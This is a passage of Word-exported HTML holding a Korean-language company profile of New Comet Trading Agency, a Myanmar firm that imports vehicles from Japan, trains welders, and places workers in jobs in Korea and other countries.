Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span 